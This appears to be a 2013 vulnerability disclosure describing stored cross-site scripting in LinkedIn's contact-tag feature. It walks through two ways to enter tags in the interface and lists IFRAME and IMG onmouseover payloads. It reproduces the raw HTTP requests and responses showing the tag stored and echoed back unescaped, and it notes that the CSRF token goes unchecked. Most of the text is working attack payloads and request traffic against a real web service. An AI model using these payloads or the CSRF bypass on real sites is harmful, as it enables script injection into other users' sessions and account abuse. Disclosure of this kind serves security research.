=========================
First Option
=========================
You can go to LinkedIn Contacts -> Connections -> Manage. After, on the
"Add New Tag" field, you can put these tags, for example:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
+ <IMG SRC=# onmouseover="alert('XSS')">
+ <IMG onmouseover="alert('XSS')">
Finally, you should pulse "Add New Tag" button, and then show you the injection.
=========================
Second Option
=========================
You can go to LinkedIn Contacts -> Connections -> All Connections and then select one contact.
After, on the right panel, you have a "Tags:" label, and you should pulse "Edit tags". Then you can put this tags, for example:
+ <IFRAME SRC=# onmouseover="alert('XSS')">
+ <IMG onmouseover="alert('XSS')">
Finally, you should pulse "+" button, and then show you the injection.
=========================
REQUESTS
=========================
First, create <IFRAME SRC=# onmouseover="alert('XSS')"> Tag:
REQUEST 1:
POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
X-IsAJAXForm: 1
Cookie: XXXX
&tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22alert('XSS')%22%3E
RESPONSE 1:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Date: Sun, 03 Mar 2013 16:49:14 GMT
X-FS-TXN-ID: 2b654458ea50
X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000
X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==
Age: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
{"content":"113275897","status":"ok"}
Second, make request for show you the tags name's:
REQUEST 2:
POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
User-Agent: MSIE 9.0
X-IsAJAXForm: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.linkedin.com/people/connections
Cookie: XXX
&tagContext=conn_detail_panel&memIds=M-220814631
Or without the csrfToken, because not verify that the csrfToken value matches with cookie session token.
RESPONSE:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Sun, 03 Mar 2013 16:50:37 GMT
X-FS-TXN-ID: 2b8fc977b850
X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000
X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==
Age: 0
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
{"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME
SRC=# onmouseover=
\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\
\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",\"{\\\"id
\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\",
\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\\\":\\\"tagsAllHave\\
\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group
members\\\",\\\"bucket\\\":\\
\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"partners\\\",\\\"bucket\\
\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}